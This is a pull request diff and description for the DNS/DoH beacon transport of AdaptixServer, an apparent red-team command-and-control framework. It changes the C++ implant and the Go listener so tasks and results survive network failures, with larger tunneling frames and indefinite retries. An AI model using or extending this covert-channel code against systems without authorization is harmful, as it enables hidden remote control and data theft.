### PR TITLE
Fix DNS/DoH beacon reliability: prevent task loss and improve data exchange

### DIFF
--- a/AdaptixServer/extenders/beacon_agent/pl_main.go
+++ b/AdaptixServer/extenders/beacon_agent/pl_main.go
@@ -490,7 +490,7 @@ func (p *PluginAgent) GenerateProfiles(profile adaptix.BuildProfile) ([][]byte, 
 			if userAgent == "" {
 				userAgent = "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0"
 			}
-			params, err = buildDNSProfileParams(generateConfig, listenerMap, userAgent)
+			params, err = buildDNSProfileParams(params, generateConfig, listenerMap, userAgent)
 			if err != nil {
 				return nil, err
 			}

--- a/AdaptixServer/extenders/beacon_agent/pl_utils.go
+++ b/AdaptixServer/extenders/beacon_agent/pl_utils.go
@@ -279,7 +279,7 @@ func formatBurstStatus(enabled int, sleepMs int, jitterPct int) string {
 	return fmt.Sprintf("on (sleep=%dms, jitter=%d%%)", sleepMs, jitterPct)
 }
 
-func buildDNSProfileParams(generateConfig GenerateConfig, listenerMap map[string]any, userAgent string) ([]interface{}, error) {
+func buildDNSProfileParams(params []interface{}, generateConfig GenerateConfig, listenerMap map[string]any, userAgent string) ([]interface{}, error) {
 
 	domain, _ := listenerMap["domain"].(string)
 
@@ -336,7 +336,7 @@ func buildDNSProfileParams(generateConfig GenerateConfig, listenerMap map[string
 		burstJitter = 0
 	}
 
-	params := []interface{}{
+	params = append(params,
 		domain,
 		resolvers,
 		dohResolvers,
@@ -347,9 +347,9 @@ func buildDNSProfileParams(generateConfig GenerateConfig, listenerMap map[string
 		burstEnabled,
 		burstSleep,
 		burstJitter,
-		dnsMode, // DNS mode (0=UDP, 1=DoH, 2=UDP->DoH, 3=DoH->UDP)
+		dnsMode,
 		userAgent,
-	}
+	)
 
 	return params, nil
 }

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorDNS.cpp
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorDNS.cpp
@@ -1167,16 +1167,9 @@ void ConnectorDNS::SendHeartbeat()
     else {
         this->lastQueryOk = FALSE;
         this->consecutiveFailures++;
-
-        if (this->consecutiveFailures >= 5) {
-            this->hasPendingTasks = FALSE;
-            this->downAckOffset = 0;
-            // Don't reset downBuf/downTotal - keep download state if in progress
-        }
     }
 }
 
-// Private helper: Send ACK after upload
 void ConnectorDNS::SendAck()
 {
     ULONG ackNonce = this->functions->GetTickCount() ^ (this->seq * 7919) ^ 0xACEACE;
@@ -1363,7 +1356,7 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
                 if (retry > 0) {
                     this->functions->Sleep(100 + (this->functions->GetTickCount() % 50));
                 }
-                putOk = QueryWithRotation(qname, this->qtype, tmp, sizeof(tmp), &tmpSize);
+                putOk = QueryWithRotation(qname, "A", tmp, sizeof(tmp), &tmpSize);
             }
 
             if (!putOk) {
@@ -1405,9 +1398,8 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
                 offset = sendOffset + chunk;
             }
 
-            // Inter-fragment pacing
+            // Inter-fragment pacing (lightweight delay to avoid flooding resolvers)
             if (this->profile.burst_enabled && this->profile.burst_sleep > 0) {
-                // Burst ON: use burst_sleep (milliseconds)
                 ULONG pacing = this->profile.burst_sleep;
                 ULONG jitterPct = this->profile.burst_jitter;
                 if (jitterPct > 0 && jitterPct <= 90) {
@@ -1418,10 +1410,8 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
                 }
                 this->functions->Sleep(pacing);
             }
-            else if (this->sleepDelaySeconds > 0) {
-                // Burst OFF: use sleep_delay (seconds -> milliseconds)
-                ULONG pacing = this->sleepDelaySeconds * 1000;
-                this->functions->Sleep(pacing);
+            else {
+                this->functions->Sleep(50 + (this->functions->GetTickCount() & 0x1F));
             }
         }
 
@@ -1433,13 +1423,8 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
         else {
             this->lastQueryOk = FALSE;
             this->consecutiveFailures++;
-
-            if (this->consecutiveFailures >= 5) {
-                this->hasPendingTasks = FALSE;
-            }
         }
 
-        // Send ACK if needed
         if (this->downAckOffset > 0)
             SendAck();
         return;
@@ -1519,7 +1504,9 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
         // Check for "no data" response: "OK" or empty/small response
         if ((respSize == 2 && respBuf[0] == 'O' && respBuf[1] == 'K') ||
             (respSize <= 4)) {
-            this->hasPendingTasks = FALSE;  // Reset flag when server says "no data"
+            this->hasPendingTasks = FALSE;
+            this->downAckOffset = 0;
+            this->downTaskNonce = 0;
             return;
         }
 
@@ -1662,14 +1649,8 @@ void ConnectorDNS::SendData(BYTE* data, ULONG data_size)
         this->recvSize = (int)binLen;
     }
     else {
-        // GET request failed - increment failure counter
         this->lastQueryOk = FALSE;
         this->consecutiveFailures++;
-
-        if (this->consecutiveFailures >= 5) {
-            this->hasPendingTasks = FALSE;
-            this->downAckOffset = 0;
-        }
     }
 }
 
@@ -1694,5 +1675,5 @@ void ConnectorDNS::RecvClear()
 
 BOOL ConnectorDNS::IsBusy() const
 {
-    return (this->downBuf != NULL) || this->hasPendingTasks;
+    return (this->downBuf != NULL) || this->hasPendingTasks || (this->downAckOffset > 0);
 }

--- a/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorDNS.h
+++ b/AdaptixServer/extenders/beacon_agent/src_beacon/beacon/ConnectorDNS.h
@@ -63,7 +63,7 @@ public:
     static const ULONG kMaxDownloadSize = 4 << 20;  // 4 MB
     static const ULONG kDefaultPktSize = 1024;
     static const ULONG kMaxPktSize = 64000;
-    static const ULONG kMaxSafeFrame = 60;
+    static const ULONG kMaxSafeFrame = 110;
     static const ULONG kDefaultLabelSize = 48;
     static const ULONG kMaxLabelSize = 63;
     static const ULONG kMetaSize = sizeof(DNS_META_V1);

--- a/AdaptixServer/extenders/beacon_listener_dns/pl_transport.go
+++ b/AdaptixServer/extenders/beacon_listener_dns/pl_transport.go
@@ -76,9 +76,11 @@ func validConfig(config string) error {
 		return errors.New("domain is required")
 	}
 
-	keyLen := len(conf.EncryptKey)
-	if keyLen < 6 || keyLen > 32 {
-		return errors.New("encrypt_key must be 6-32 characters")
+	if len(conf.EncryptKey) != 32 {
+		return errors.New("encrypt_key must be exactly 32 hex characters (16 bytes)")
+	}
+	if _, err := hex.DecodeString(conf.EncryptKey); err != nil {
+		return errors.New("encrypt_key must be a valid hex string")
 	}
 
 	return nil
@@ -295,7 +297,6 @@ func (t *TransportDNS) handleHB(req *dnsRequest) (needsReset bool, hasPendingTas
 		_ = Ts.TsAgentSetTick(req.sid, t.Name)
 	}
 
-	// Check if this SID needs reset
 	t.mu.Lock()
 	if t.needsReset[req.sid] {
 		needsReset = true
@@ -317,11 +318,23 @@ func (t *TransportDNS) handleHB(req *dnsRequest) (needsReset bool, hasPendingTas
 	df, hasDf := t.downFrags[req.sid]
 	if hasDf && df != nil {
 		df.lastUpdate = time.Now()
-		if df.total > 0 && ackOffset >= df.total && ackTaskNonce == df.taskNonce {
+		delivered := false
+		if df.total > 0 && ackOffset >= df.total {
+			if ackTaskNonce == df.taskNonce || ackTaskNonce == 0 {
+				delivered = true
+			}
+		}
+		if delivered {
 			delete(t.localInflights, req.sid)
 			delete(t.downFrags, req.sid)
 			df = nil
 			hasDf = false
+		}
+	} else if ackOffset > 0 {
+		if inf, ok := t.localInflights[req.sid]; ok && inf != nil {
+			if ackTaskNonce == inf.nonce || ackTaskNonce == 0 {
+				delete(t.localInflights, req.sid)
+			}
 		}
 	}
 	t.mu.Unlock()
@@ -366,6 +379,7 @@ func (t *TransportDNS) handleGET(req *dnsRequest, w dns.ResponseWriter) []byte {
 	if df == nil || df.off >= df.total {
 		if df != nil && df.off >= df.total {
 			t.mu.Lock()
+			delete(t.localInflights, req.sid)
 			delete(t.downFrags, req.sid)
 			t.mu.Unlock()
 			df = nil
@@ -479,7 +493,9 @@ func (t *TransportDNS) handlePutFragment(sid string, seq int, data []byte, ack p
 
 	t.mu.Lock()
 
-	if done, exists := t.upDoneCache[sid]; exists && done.total == total {
+	if offset == 0 {
+		delete(t.upDoneCache, sid)
+	} else if done, exists := t.upDoneCache[sid]; exists && done.total == total {
 		ack.complete = true
 		ack.filled = done.total
 		ack.lastReceivedOff = done.total
@@ -726,7 +742,6 @@ func (t *TransportDNS) buildDataResponse(req *dnsRequest, frame []byte, ttl uint
 	}
 }
 
-// Task Fetching (unified for GET and HB)
 func (t *TransportDNS) fetchOrRetryTasks(sid string) ([]byte, uint32) {
 	t.mu.Lock()
 	existingInflight, hasInflight := t.localInflights[sid]
@@ -734,6 +749,7 @@ func (t *TransportDNS) fetchOrRetryTasks(sid string) ([]byte, uint32) {
 
 	if hasInflight && existingInflight != nil {
 		existingInflight.attempts++
+		existingInflight.createdAt = time.Now()
 		return existingInflight.data, existingInflight.nonce
 	}
 
@@ -768,7 +784,7 @@ func (t *TransportDNS) ackDelivery(sid string, ackTaskNonce uint32) {
 		return
 	}
 
-	if ackTaskNonce == df.taskNonce {
+	if ackTaskNonce == df.taskNonce || ackTaskNonce == 0 {
 		delete(t.localInflights, sid)
 		delete(t.downFrags, sid)
 	}
@@ -809,31 +825,31 @@ func (t *TransportDNS) cleanupStaleEntries() {
 	t.mu.Lock()
 	defer t.mu.Unlock()
 
-	// Cleanup stale upload fragments
 	for sid, fb := range t.upFrags {
 		if now.Sub(fb.lastUpdate) > staleTimeout {
 			delete(t.upFrags, sid)
 		}
 	}
 
-	// Cleanup stale download buffers
 	for sid, db := range t.downFrags {
 		if now.Sub(db.lastUpdate) > downTimeout {
+			if _, hasInf := t.localInflights[sid]; !hasInf {
+				t.localInflights[sid] = newInflight(db.buf, db.taskNonce)
+			}
 			delete(t.downFrags, sid)
 		}
 	}
 
-	// Cleanup expired dedup cache
 	for sid, done := range t.upDoneCache {
 		if now.Sub(done.doneAt) > dedupTimeout {
 			delete(t.upDoneCache, sid)
 		}
 	}
 
-	// Cleanup stale inflights
-	for sid, inf := range t.localInflights {
-		if now.Sub(inf.createdAt) > inflightTimeout || inf.attempts > maxInflightAttempts {
-			delete(t.localInflights, sid)
+	for _, inf := range t.localInflights {
+		if now.Sub(inf.createdAt) > inflightTimeout {
+			inf.createdAt = now
+			inf.attempts = 0
 		}
 	}
 }
@@ -846,18 +862,17 @@ const (
 	maxUploadSize    = 4 << 20 // 4 MB
 	maxDownloadSize  = 4 << 20 // 4 MB
 	minCompressSize  = 2048
-	dnsSafeChunkSize = 280
+	dnsSafeChunkSize = 480
 	defaultChunkSize = 4096
 	metaV1Size       = 8
 	frameHeaderSize  = 9 // flags:1 + nonce:4 + origLen:4
 
-	staleTimeout        = 5 * time.Minute
-	dedupTimeout        = 5 * time.Minute
-	downTimeout         = 10 * time.Minute
-	inflightTimeout     = 5 * time.Minute
-	maxInflightAttempts = 10
-	cleanupInterval     = 60 * time.Second
-	shutdownTimeout     = 2 * time.Second
+	staleTimeout    = 5 * time.Minute
+	dedupTimeout    = 5 * time.Minute
+	downTimeout     = 10 * time.Minute
+	inflightTimeout = 2 * time.Minute
+	cleanupInterval = 10 * time.Second
+	shutdownTimeout = 2 * time.Second
 )
 
 // Types

--- a/Dockerfile
+++ b/Dockerfile
@@ -1,4 +1,4 @@
-FROM golang:1.25-bookworm AS base
+FROM golang:1.26.1-bookworm AS base
 
 RUN apt-get update && \
     apt-get install -y --no-install-recommends \
@@ -166,12 +166,12 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     git \
     && rm -rf /var/lib/apt/lists/*
 
-RUN wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz && \
+RUN wget https://go.dev/dl/go1.26.1.linux-amd64.tar.gz -O /tmp/go1.26.1.linux-amd64.tar.gz && \
     rm -rf /usr/local/go /usr/local/bin/go && \
-    tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz && \
+    tar -C /usr/local -xzf /tmp/go1.26.1.linux-amd64.tar.gz && \
     ln -s /usr/local/go/bin/go /usr/local/bin/go && \
-    rm /tmp/go1.25.4.linux-amd64.tar.gz && \
-    echo "[+] Go 1.25.4 installed successfully"
+    rm /tmp/go1.26.1.linux-amd64.tar.gz && \
+    echo "[+] Go 1.26.1 installed successfully"
 
 RUN git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7 && \
     mv /tmp/go-win7 /usr/lib/ && \

--- a/pre_install_linux_all.sh
+++ b/pre_install_linux_all.sh
@@ -5,7 +5,7 @@ YELLOW=$(printf '\033[1;33m')
 RED=$(printf '\033[1;31m')
 NC=$(printf '\033[0m')
 
-GO_VERSION='1.25.4'
+GO_VERSION='1.26.1'
 
 ERROR_FILE="$(date "+%d.%m.%Y_%H-%M-%S")-error.log"
 


### PR DESCRIPTION
## Summary

- Fix DNS beacon profile generation that was silently dropping common fields (sleep, jitter, killdate) by appending DNS-specific params to the existing slice instead of creating a new one
- Fix critical task loss bug where `upDoneCache` (upload deduplication cache) falsely marked new task results as already processed when their size matched a previous upload — now cleared on every new upload (`offset == 0`)
- Fix agent-side reliability: use A query type for PUT ACK instead of TXT, keep burst mode active until ACK is delivered via `IsBusy()`, remove premature `hasPendingTasks` resets on transient network failures
- Improve inflight retry: expired download buffers are transferred to `localInflights` for redelivery instead of being dropped; inflights reset on timeout (infinite retry) instead of being deleted after N attempts
- Upgrade Go to 1.26.1 in Dockerfile and install script

## Changes

| File | Description |
|------|-------------|
| `Dockerfile`, `pre_install_linux_all.sh` | Go 1.25 -> 1.26.1 |
| `beacon_agent/pl_main.go`, `pl_utils.go` | Pass existing `params` into `buildDNSProfileParams` instead of creating a new slice |
| `beacon_agent/.../ConnectorDNS.cpp` | PUT via A query, IsBusy includes `downAckOffset`, removed false `hasPendingTasks` resets |
| `beacon_agent/.../ConnectorDNS.h` | `kMaxSafeFrame` 60 -> 110 |
| `beacon_listener_dns/pl_transport.go` | Fix `upDoneCache` dedup, accept ACK with `nonce==0`, inflight infinite retry, stricter `encrypt_key` validation, `dnsSafeChunkSize` 280 -> 480 |